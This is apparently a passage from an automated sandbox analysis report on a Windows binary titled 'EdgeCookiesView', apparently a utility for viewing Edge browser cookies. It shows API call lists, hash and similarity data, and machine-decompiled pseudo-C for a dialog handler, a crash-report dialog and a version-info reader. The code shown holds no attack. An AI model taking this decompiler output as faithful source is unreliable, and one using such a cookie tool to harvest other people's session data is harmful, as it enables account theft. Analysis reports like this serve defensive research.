                                                                                                                                                      • ImageList_Add.COMCTL32(?,00000000,00000000), ref: 0040A8E0
                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0040A8E9
                                                                                                                                                      • SendMessageW.USER32(?,00000436,00000000,?), ref: 0040A8FE
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040A919
                                                                                                                                                      • CreateWindowExW.USER32 ref: 0040A940
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00000000,00000001), ref: 0040A9BA
                                                                                                                                                      • LoadIconW.USER32(00000000,00000066), ref: 0040A9C3
                                                                                                                                                      • ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 0040A9D1
                                                                                                                                                      • memcpy.MSVCRT ref: 0040AA22
                                                                                                                                                      • ShowWindow.USER32(?,?), ref: 0040AA58
                                                                                                                                                      • GetFileAttributesW.KERNEL32(004134E0), ref: 0040AA89
                                                                                                                                                      • GetTempPathW.KERNEL32(00000104,004134E0), ref: 0040AA99
                                                                                                                                                      • wcslen.MSVCRT ref: 0040AAA0
                                                                                                                                                      • wcslen.MSVCRT ref: 0040AAAE
                                                                                                                                                      • RegisterWindowMessageW.USER32(commdlg_FindReplace,00000001), ref: 0040AB0D
                                                                                                                                                      • SendMessageW.USER32(?,00000404,00000002,?), ref: 0040AB45
                                                                                                                                                      • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 0040AB58
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Object$CreatePixel$ImageMessage$HandleLoadModuleSelectSendWindow$DeleteList_$ColorCompatibleIconMenuwcslen$AttributesFilePathRegisterReplaceShowStatusTempToolbarmemcpy
                                                                                                                                                      • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$4A
                                                                                                                                                      • API String ID: 945479791-4224175941
                                                                                                                                                      • Opcode ID: 04a5916b9d1b1c31dadef9f7ad9415178030fb231d71024c6285b7e26b69c7e2
                                                                                                                                                      • Instruction ID: ef4bcdae66b01cb0e556df410aa057252edbff8cd3310fcf9c61045b6203d9f2
                                                                                                                                                      • Opcode Fuzzy Hash: 04a5916b9d1b1c31dadef9f7ad9415178030fb231d71024c6285b7e26b69c7e2
                                                                                                                                                      • Instruction Fuzzy Hash: 35C1C271640344AFEB21DF64CC89FDA3BA5AF54304F04447AFE48AB2A2C7B59844CB69
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 004010C7, Relevance: 47.4, APIs: 26, Strings: 1, Instructions: 184COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 85%
                                                                                                                                                      			E004010C7(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, unsigned int _a12) {
				struct tagPOINT _v12;
				void* __esi;
				void* _t47;
				struct HBRUSH__* _t56;
				void* _t61;
				unsigned int _t63;
				void* _t68;
				struct HWND__* _t69;
				struct HWND__* _t70;
				void* _t73;
				unsigned int _t74;
				struct HWND__* _t76;
				struct HWND__* _t77;
				struct HWND__* _t78;
				struct HWND__* _t79;
				unsigned int _t85;
				struct HWND__* _t87;
				struct HWND__* _t89;
				struct HWND__* _t90;
				struct tagPOINT _t96;
				struct tagPOINT _t98;
				signed short _t103;
				void* _t106;
				void* _t117;

				_t106 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t47 = _a4 - 0x110;
				_t117 = __ecx;
				if(_t47 == 0) {
					__eflags =  *0x412f50;
					if(__eflags != 0) {
						SetDlgItemTextW( *(__ecx + 0x10), 0x3ee, 0x412f50);
					} else {
						ShowWindow(GetDlgItem( *(__ecx + 0x10), 0x3ed), 0);
						ShowWindow(GetDlgItem( *(_t117 + 0x10), 0x3ee), 0);
					}
					SetWindowTextW( *(_t117 + 0x10), L"EdgeCookiesView");
					SetDlgItemTextW( *(_t117 + 0x10), 0x3ea, _t117 + 0x40);
					SetDlgItemTextW( *(_t117 + 0x10), 0x3ec, _t117 + 0x23e);
					E0040103E(_t117, __eflags);
					E00405B17(_t106,  *(_t117 + 0x10), 4);
					goto L30;
				} else {
					_t61 = _t47 - 1;
					if(_t61 == 0) {
						_t103 = _a8;
						_t63 = _t103 >> 0x10;
						__eflags = _t103 - 1;
						if(_t103 == 1) {
							L24:
							__eflags = _t63;
							if(_t63 != 0) {
								goto L30;
							} else {
								EndDialog( *(_t117 + 0x10), _t103 & 0x0000ffff);
								DeleteObject( *(_t117 + 0x43c));
								goto L8;
							}
						} else {
							__eflags = _t103 - 2;
							if(_t103 != 2) {
								goto L30;
							} else {
								goto L24;
							}
						}
					} else {
						_t68 = _t61 - 0x27;
						if(_t68 == 0) {
							_t69 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
							__eflags = _a12 - _t69;
							if(_a12 != _t69) {
								__eflags =  *0x412fd0;
								if( *0x412fd0 == 0) {
									goto L30;
								} else {
									_t70 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
									__eflags = _a12 - _t70;
									if(_a12 != _t70) {
										goto L30;
									} else {
										goto L18;
									}
								}
							} else {
								L18:
								SetBkMode(_a8, 1);
								SetTextColor(_a8, 0xc00000);
								_t56 = GetSysColorBrush(0xf);
							}
						} else {
							_t73 = _t68 - 0xc8;
							if(_t73 == 0) {
								_t74 = _a12;
								_t96 = _t74 & 0x0000ffff;
								_v12.x = _t96;
								_v12.y = _t74 >> 0x10;
								_t76 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
								_push(_v12.y);
								_a8 = _t76;
								_t77 = ChildWindowFromPoint( *(_t117 + 0x10), _t96);
								__eflags = _t77 - _a8;
								if(_t77 != _a8) {
									__eflags =  *0x412fd0;
									if( *0x412fd0 == 0) {
										goto L30;
									} else {
										_t78 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
										_push(_v12.y);
										_t79 = ChildWindowFromPoint( *(_t117 + 0x10), _v12.x);
										__eflags = _t79 - _t78;
										if(_t79 != _t78) {
											goto L30;
										} else {
											goto L13;
										}
									}
								} else {
									L13:
									SetCursor(LoadCursorW(GetModuleHandleW(0), 0x67));
									goto L8;
								}
							} else {
								if(_t73 != 0) {
									L30:
									_t56 = 0;
									__eflags = 0;
								} else {
									_t85 = _a12;
									_t98 = _t85 & 0x0000ffff;
									_v12.x = _t98;
									_v12.y = _t85 >> 0x10;
									_t87 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
									_push(_v12.y);
									_a8 = _t87;
									if(ChildWindowFromPoint( *(_t117 + 0x10), _t98) != _a8) {
										__eflags =  *0x412fd0;
										if( *0x412fd0 == 0) {
											goto L30;
										} else {
											_t89 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
											_push(_v12.y);
											_t90 = ChildWindowFromPoint( *(_t117 + 0x10), _v12);
											__eflags = _t90 - _t89;
											if(_t90 != _t89) {
												goto L30;
											} else {
												_push(0x412fd0);
												goto L7;
											}
										}
									} else {
										_push(_t117 + 0x23e);
										L7:
										_push( *(_t117 + 0x10));
										E00405CD2();
										L8:
										_t56 = 1;
									}
								}
							}
						}
					}
				}
				return _t56;
			}



























                                                                                                                                                      0x004010c7
                                                                                                                                                      0x004010ca
                                                                                                                                                      0x004010cb
                                                                                                                                                      0x004010cf
                                                                                                                                                      0x004010d7
                                                                                                                                                      0x004010d9
                                                                                                                                                      0x004012a4
                                                                                                                                                      0x004012ac
                                                                                                                                                      0x004012e7
                                                                                                                                                      0x004012ae
                                                                                                                                                      0x004012c7
                                                                                                                                                      0x004012d6
                                                                                                                                                      0x004012d6
                                                                                                                                                      0x004012f5
                                                                                                                                                      0x0040130d
                                                                                                                                                      0x0040131e
                                                                                                                                                      0x00401320
                                                                                                                                                      0x0040132a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004010df
                                                                                                                                                      0x004010df
                                                                                                                                                      0x004010e0
                                                                                                                                                      0x00401265
                                                                                                                                                      0x0040126a
                                                                                                                                                      0x0040126d
                                                                                                                                                      0x00401271
                                                                                                                                                      0x0040127d
                                                                                                                                                      0x0040127d
                                                                                                                                                      0x00401280
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401286
                                                                                                                                                      0x0040128d
                                                                                                                                                      0x00401299
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401299
                                                                                                                                                      0x00401273
                                                                                                                                                      0x00401273
                                                                                                                                                      0x00401277
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401277
                                                                                                                                                      0x004010e6
                                                                                                                                                      0x004010e6
                                                                                                                                                      0x004010e9
                                                                                                                                                      0x00401215
                                                                                                                                                      0x00401217
                                                                                                                                                      0x0040121a
                                                                                                                                                      0x00401242
                                                                                                                                                      0x0040124a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401250
                                                                                                                                                      0x00401258
                                                                                                                                                      0x0040125a
                                                                                                                                                      0x0040125d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401263
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401263
                                                                                                                                                      0x0040125d
                                                                                                                                                      0x0040121c
                                                                                                                                                      0x0040121c
                                                                                                                                                      0x00401221
                                                                                                                                                      0x0040122f
                                                                                                                                                      0x00401237
                                                                                                                                                      0x00401237
                                                                                                                                                      0x004010ef
                                                                                                                                                      0x004010ef
                                                                                                                                                      0x004010f4
                                                                                                                                                      0x00401185
                                                                                                                                                      0x0040118e
                                                                                                                                                      0x0040119c
                                                                                                                                                      0x0040119f
                                                                                                                                                      0x004011a2
                                                                                                                                                      0x004011a4
                                                                                                                                                      0x004011a7
                                                                                                                                                      0x004011b4
                                                                                                                                                      0x004011b6
                                                                                                                                                      0x004011b9
                                                                                                                                                      0x004011d8
                                                                                                                                                      0x004011e0
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004011e6
                                                                                                                                                      0x004011ee
                                                                                                                                                      0x004011f0
                                                                                                                                                      0x004011fb
                                                                                                                                                      0x004011fd
                                                                                                                                                      0x004011ff
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401205
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401205
                                                                                                                                                      0x004011ff
                                                                                                                                                      0x004011bb
                                                                                                                                                      0x004011bb
                                                                                                                                                      0x004011cd
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004011cd
                                                                                                                                                      0x004010fa
                                                                                                                                                      0x004010fc
                                                                                                                                                      0x00401331
                                                                                                                                                      0x00401331
                                                                                                                                                      0x00401331
                                                                                                                                                      0x00401102
                                                                                                                                                      0x00401102
                                                                                                                                                      0x0040110b
                                                                                                                                                      0x00401119
                                                                                                                                                      0x0040111c
                                                                                                                                                      0x0040111f
                                                                                                                                                      0x00401121
                                                                                                                                                      0x00401124
                                                                                                                                                      0x00401136
                                                                                                                                                      0x00401151
                                                                                                                                                      0x00401159
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040115f
                                                                                                                                                      0x00401167
                                                                                                                                                      0x00401169
                                                                                                                                                      0x00401174
                                                                                                                                                      0x00401176
                                                                                                                                                      0x00401178
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040117e
                                                                                                                                                      0x0040117e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040117e
                                                                                                                                                      0x00401178
                                                                                                                                                      0x00401138
                                                                                                                                                      0x0040113e
                                                                                                                                                      0x0040113f
                                                                                                                                                      0x0040113f
                                                                                                                                                      0x00401142
                                                                                                                                                      0x00401149
                                                                                                                                                      0x0040114b
                                                                                                                                                      0x0040114b
                                                                                                                                                      0x00401136
                                                                                                                                                      0x004010fc
                                                                                                                                                      0x004010f4
                                                                                                                                                      0x004010e9
                                                                                                                                                      0x004010e0
                                                                                                                                                      0x00401337

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                                                      • String ID: EdgeCookiesView
                                                                                                                                                      • API String ID: 829165378-2656830938
                                                                                                                                                      • Opcode ID: c334951574b09e503c6ba9ad871ca57f87af409fc7462e6d36551130802c1d45
                                                                                                                                                      • Instruction ID: d9b36552e8d9c1158f8869abb926452dfc915059135fe28c0a7548d8f12e7aa6
                                                                                                                                                      • Opcode Fuzzy Hash: c334951574b09e503c6ba9ad871ca57f87af409fc7462e6d36551130802c1d45
                                                                                                                                                      • Instruction Fuzzy Hash: 87515A31500308EBEB31AF60DD44AAE7BB5FB44301F104A3AF951B69F0C778AD59AB08
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0040C0C7, Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 216windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 45%
                                                                                                                                                      			E0040C0C7(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, void* _a8, unsigned int _a12) {
				void _v259;
				void _v260;
				void _v515;
				void _v516;
				char _v1048;
				void _v1052;
				void _v1056;
				void _v1560;
				long _v1580;
				void _v3626;
				char _v3628;
				void _v5674;
				char _v5676;
				void _v9770;
				short _v9772;
				void* __edi;
				void* _t45;
				void* _t60;
				int _t61;
				int _t63;
				int _t64;
				long _t68;
				struct HWND__* _t94;
				signed int _t103;
				intOrPtr _t127;
				unsigned int _t130;
				void* _t132;
				void* _t135;

				E0040E340(0x2628, __ecx);
				_t45 = _a8 - 0x110;
				if(_t45 == 0) {
					E00405B17(__edx, _a4, 4);
					_v9772 = 0;
					memset( &_v9770, 0, 0xffe);
					_t103 = 5;
					memcpy( &_v1580, L"{Unknown}", _t103 << 2);
					memset( &_v1560, 0, 0x1f6);
					_v260 = 0;
					memset( &_v259, 0, 0xff);
					_v516 = 0;
					memset( &_v515, 0, 0xff);
					_v5676 = 0;
					memset( &_v5674, 0, 0x7fe);
					_v3628 = 0;
					memset( &_v3626, 0, 0x7fe);
					_t135 = _t132 + 0x5c;
					_t60 = GetCurrentProcess();
					_t105 =  &_v260;
					_a8 = _t60;
					_t61 = ReadProcessMemory(_t60,  *0x41245c,  &_v260, 0x80, 0);
					__eflags = _t61;
					if(_t61 != 0) {
						E00405D33( &_v5676,  &_v260, 4);
						_pop(_t105);
					}
					_t63 = ReadProcessMemory(_a8,  *0x412450,  &_v516, 0x80, 0);
					__eflags = _t63;
					if(_t63 != 0) {
						E00405D33( &_v3628,  &_v516, 0);
						_pop(_t105);
					}
					_t64 = E0040591F();
					__eflags = _t64;
					if(_t64 == 0) {
						E0040C9D6();
					} else {
						E0040CA5A();
					}
					__eflags =  *0x41325c; // 0x0
					if(__eflags != 0) {
						L17:
						_v1056 = 0;
						memset( &_v1052, 0, 0x218);
						_t127 =  *0x412674; // 0x0
						_t135 = _t135 + 0xc;
						_t68 = GetCurrentProcessId();
						_push(_t127);
						_push(_t68);
						 *0x4128ec = 0;
						E0040CBD8(_t105, __eflags);
						__eflags =  *0x4128ec; // 0x0
						if(__eflags != 0) {
							memcpy( &_v1056, 0x4128f0, 0x21c);
							_t135 = _t135 + 0xc;
							__eflags =  *0x4128ec; // 0x0
							if(__eflags != 0) {
								wcscpy( &_v1580, E00405888( &_v1048));
							}
						}
						goto L20;
					} else {
						__eflags =  *0x413260; // 0x0
						if(__eflags == 0) {
							L20:
							_push( &_v3628);
							_push( &_v5676);
							_push( *0x412450);
							_push( *0x41245c);
							_push( *0x41244c);
							_push( *0x412434);
							_push( *0x412438);
							_push( *0x412440);
							_push( *0x412444);
							_push( *0x41243c);
							_push( *0x412448);
							_push( &_v1580);
							_push( *0x412674);
							_push( *0x412668);
							_push(L"Exception %8.8X at address %8.8X in module %s\r\nRegisters: \r\nEAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8X\r\nESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8X\r\nEIP=%8.8X\r\nStack Data: %s\r\nCode Data: %s\r\n");
							_push(0x800);
							_push( &_v9772);
							L0040DFD6();
							SetDlgItemTextW(_a4, 0x3ea,  &_v9772);
							SetFocus(GetDlgItem(_a4, 0x3ea));
							L21:
							return 0;
						}
						goto L17;
					}
				}
				if(_t45 == 1) {
					_t130 = _a12;
					if(_t130 >> 0x10 == 0) {
						if(_t130 == 3) {
							_t94 = GetDlgItem(_a4, 0x3ea);
							_a4 = _t94;
							SendMessageW(_t94, 0xb1, 0, 0xffff);
							SendMessageW(_a4, 0x301, 0, 0);
							SendMessageW(_a4, 0xb1, 0, 0);
						}
					}
				}
				goto L21;
			}































                                                                                                                                                      0x0040c0cf
                                                                                                                                                      0x0040c0d7
                                                                                                                                                      0x0040c0df
                                                                                                                                                      0x0040c162
                                                                                                                                                      0x0040c176
                                                                                                                                                      0x0040c17d
                                                                                                                                                      0x0040c184
                                                                                                                                                      0x0040c19d
                                                                                                                                                      0x0040c19f
                                                                                                                                                      0x0040c1b2
                                                                                                                                                      0x0040c1b8
                                                                                                                                                      0x0040c1c6
                                                                                                                                                      0x0040c1cc
                                                                                                                                                      0x0040c1df
                                                                                                                                                      0x0040c1e6
                                                                                                                                                      0x0040c1f7
                                                                                                                                                      0x0040c1fe
                                                                                                                                                      0x0040c203
                                                                                                                                                      0x0040c206
                                                                                                                                                      0x0040c218
                                                                                                                                                      0x0040c225
                                                                                                                                                      0x0040c229
                                                                                                                                                      0x0040c22b
                                                                                                                                                      0x0040c22d
                                                                                                                                                      0x0040c23e
                                                                                                                                                      0x0040c244
                                                                                                                                                      0x0040c244
                                                                                                                                                      0x0040c25b
                                                                                                                                                      0x0040c25d
                                                                                                                                                      0x0040c25f
                                                                                                                                                      0x0040c26f
                                                                                                                                                      0x0040c275
                                                                                                                                                      0x0040c275
                                                                                                                                                      0x0040c276
                                                                                                                                                      0x0040c27b
                                                                                                                                                      0x0040c27d
                                                                                                                                                      0x0040c286
                                                                                                                                                      0x0040c27f
                                                                                                                                                      0x0040c27f
                                                                                                                                                      0x0040c27f
                                                                                                                                                      0x0040c28b
                                                                                                                                                      0x0040c291
                                                                                                                                                      0x0040c29b
                                                                                                                                                      0x0040c2a8
                                                                                                                                                      0x0040c2ae
                                                                                                                                                      0x0040c2b3
                                                                                                                                                      0x0040c2b9
                                                                                                                                                      0x0040c2bc
                                                                                                                                                      0x0040c2c2
                                                                                                                                                      0x0040c2c3
                                                                                                                                                      0x0040c2c4
                                                                                                                                                      0x0040c2ca
                                                                                                                                                      0x0040c2cf
                                                                                                                                                      0x0040c2d7
                                                                                                                                                      0x0040c2ea
                                                                                                                                                      0x0040c2ef
                                                                                                                                                      0x0040c2f2
                                                                                                                                                      0x0040c2f8
                                                                                                                                                      0x0040c30d
                                                                                                                                                      0x0040c313
                                                                                                                                                      0x0040c2f8
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c293
                                                                                                                                                      0x0040c293
                                                                                                                                                      0x0040c299
                                                                                                                                                      0x0040c314
                                                                                                                                                      0x0040c31a
                                                                                                                                                      0x0040c321
                                                                                                                                                      0x0040c322
                                                                                                                                                      0x0040c32e
                                                                                                                                                      0x0040c334
                                                                                                                                                      0x0040c33a
                                                                                                                                                      0x0040c340
                                                                                                                                                      0x0040c346
                                                                                                                                                      0x0040c34c
                                                                                                                                                      0x0040c352
                                                                                                                                                      0x0040c358
                                                                                                                                                      0x0040c35e
                                                                                                                                                      0x0040c35f
                                                                                                                                                      0x0040c36b
                                                                                                                                                      0x0040c371
                                                                                                                                                      0x0040c376
                                                                                                                                                      0x0040c37b
                                                                                                                                                      0x0040c37c
                                                                                                                                                      0x0040c394
                                                                                                                                                      0x0040c3a5
                                                                                                                                                      0x0040c3ab
                                                                                                                                                      0x0040c3b1
                                                                                                                                                      0x0040c3b1
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c299
                                                                                                                                                      0x0040c291
                                                                                                                                                      0x0040c0e2
                                                                                                                                                      0x0040c0e8
                                                                                                                                                      0x0040c0f3
                                                                                                                                                      0x0040c116
                                                                                                                                                      0x0040c124
                                                                                                                                                      0x0040c13f
                                                                                                                                                      0x0040c142
                                                                                                                                                      0x0040c14e
                                                                                                                                                      0x0040c156
                                                                                                                                                      0x0040c156
                                                                                                                                                      0x0040c116
                                                                                                                                                      0x0040c0f3
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 0040C371
                                                                                                                                                      • {Unknown}, xrefs: 0040C191
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                                                      • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                                                      • API String ID: 4111938811-1819279800
                                                                                                                                                      • Opcode ID: 888bafc67b277ea66c09e682880ee55d231aecf6e6b028a468f373f7cbb56ac5
                                                                                                                                                      • Instruction ID: 3431b055b2365f4bc913e86f7a298cdc42a4156783f6a5b9feadd91d66c4c499
                                                                                                                                                      • Opcode Fuzzy Hash: 888bafc67b277ea66c09e682880ee55d231aecf6e6b028a468f373f7cbb56ac5
                                                                                                                                                      • Instruction Fuzzy Hash: B271A3B2800119EEDB20AF51DD85EDA377CEB08354F0085BAF908F6191DA799E949F68
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0040DE36, Relevance: 33.4, APIs: 8, Strings: 11, Instructions: 139COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 82%
                                                                                                                                                      			E0040DE36(intOrPtr* __edi, short* _a4) {
				int _v8;
				void* _v12;
				void* _v16;
				int _v20;
				long _v60;
				char _v572;
				void* __esi;
				int _t47;
				void* _t50;
				signed short* _t76;
				void* _t81;
				void* _t84;
				intOrPtr* _t96;
				int _t97;

				_t96 = __edi;
				_t97 = 0;
				_v20 = 0;
				_t47 = GetFileVersionInfoSizeW(_a4,  &_v20);
				_v8 = _t47;
				if(_t47 > 0) {
					_t50 = E0040674D(__edi);
					_push(_v8);
					L0040E038();
					_t84 = _t50;
					GetFileVersionInfoW(_a4, 0, _v8, _t84);
					if(VerQueryValueW(_t84, "\\",  &_v12,  &_v8) != 0) {
						_t81 = _v12;
						_t11 = _t81 + 0x30; // 0x6cdfe853
						 *((intOrPtr*)(__edi + 4)) =  *_t11;
						_t13 = _t81 + 8; // 0x8d50ffff
						 *__edi =  *_t13;
						_t14 = _t81 + 0x14; // 0x5900006c
						 *((intOrPtr*)(__edi + 0xc)) =  *_t14;
						_t16 = _t81 + 0x10; // 0xfee850ff
						 *((intOrPtr*)(__edi + 8)) =  *_t16;
						_t18 = _t81 + 0x24; // 0x38680000
						 *((intOrPtr*)(__edi + 0x10)) =  *_t18;
						_t20 = _t81 + 0x28; // 0xbb0040fa
						 *((intOrPtr*)(__edi + 0x14)) =  *_t20;
					}
					if(VerQueryValueW(_t84, L"\\VarFileInfo\\Translation",  &_v16,  &_v8) == 0) {
						L5:
						wcscpy( &_v60, L"040904E4");
					} else {
						_t76 = _v16;
						_push(_t76[1] & 0x0000ffff);
						_push( *_t76 & 0x0000ffff);
						_push(L"%4.4X%4.4X");
						_push(0x14);
						_push( &_v60);
						L0040DFD6();
						if(E0040DDA7( &_v572, _t84,  &_v60, 0x40f454) == 0) {
							goto L5;
						}
					}
					E0040DDA7(_t96 + 0x18, _t84,  &_v60, L"ProductName");
					E0040DDA7(_t96 + 0x218, _t84,  &_v60, L"FileDescription");
					E0040DDA7(_t96 + 0x418, _t84,  &_v60, L"FileVersion");
					E0040DDA7(_t96 + 0x618, _t84,  &_v60, L"ProductVersion");
					E0040DDA7(_t96 + 0x818, _t84,  &_v60, L"CompanyName");
					E0040DDA7(_t96 + 0xa18, _t84,  &_v60, L"InternalName");
					E0040DDA7(_t96 + 0xc18, _t84,  &_v60, L"LegalCopyright");
					E0040DDA7(_t96 + 0xe18, _t84,  &_v60, L"OriginalFileName");
					_push(_t84);
					_t97 = 1;
					L0040E032();
				}
				return _t97;
			}

















                                                                                                                                                      0x0040de36
                                                                                                                                                      0x0040de47
                                                                                                                                                      0x0040de49
                                                                                                                                                      0x0040de4c
                                                                                                                                                      0x0040de53
                                                                                                                                                      0x0040de56
                                                                                                                                                      0x0040de5f
                                                                                                                                                      0x0040de64
                                                                                                                                                      0x0040de67
                                                                                                                                                      0x0040de6d
                                                                                                                                                      0x0040de77
                                                                                                                                                      0x0040de91
                                                                                                                                                      0x0040de93
                                                                                                                                                      0x0040de96
                                                                                                                                                      0x0040de99
                                                                                                                                                      0x0040de9c
                                                                                                                                                      0x0040de9f
                                                                                                                                                      0x0040dea1
                                                                                                                                                      0x0040dea4
                                                                                                                                                      0x0040dea7
                                                                                                                                                      0x0040deaa
                                                                                                                                                      0x0040dead
                                                                                                                                                      0x0040deb0
                                                                                                                                                      0x0040deb3
                                                                                                                                                      0x0040deb6
                                                                                                                                                      0x0040deb6
                                                                                                                                                      0x0040dece
                                                                                                                                                      0x0040df08
                                                                                                                                                      0x0040df11
                                                                                                                                                      0x0040ded0
                                                                                                                                                      0x0040ded0
                                                                                                                                                      0x0040deda
                                                                                                                                                      0x0040dedb
                                                                                                                                                      0x0040dedc
                                                                                                                                                      0x0040dee4
                                                                                                                                                      0x0040dee6
                                                                                                                                                      0x0040dee7
                                                                                                                                                      0x0040df06
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040df06
                                                                                                                                                      0x0040df25
                                                                                                                                                      0x0040df3a
                                                                                                                                                      0x0040df4f
                                                                                                                                                      0x0040df64
                                                                                                                                                      0x0040df79
                                                                                                                                                      0x0040df8e
                                                                                                                                                      0x0040dfa3
                                                                                                                                                      0x0040dfb8
                                                                                                                                                      0x0040dfbf
                                                                                                                                                      0x0040dfc0
                                                                                                                                                      0x0040dfc1
                                                                                                                                                      0x0040dfc7
                                                                                                                                                      0x0040dfcc

                                                                                                                                                      APIs
                                                                                                                                                      • GetFileVersionInfoSizeW.VERSION(0040730B,?,00000000), ref: 0040DE4C
                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040DE67
                                                                                                                                                      • GetFileVersionInfoW.VERSION(0040730B,00000000,?,00000000,00000000,0040730B,?,00000000), ref: 0040DE77
                                                                                                                                                      • VerQueryValueW.VERSION(00000000,0040F964,0040730B,?,0040730B,00000000,?,00000000,00000000,0040730B,?,00000000), ref: 0040DE8A
                                                                                                                                                      • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040F964,0040730B,?,0040730B,00000000,?,00000000,00000000,0040730B,?,00000000), ref: 0040DEC7
                                                                                                                                                      • _snwprintf.MSVCRT ref: 0040DEE7
                                                                                                                                                      • wcscpy.MSVCRT ref: 0040DF11
                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040DFC1
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileInfoQueryValueVersion$??2@??3@Size_snwprintfwcscpy
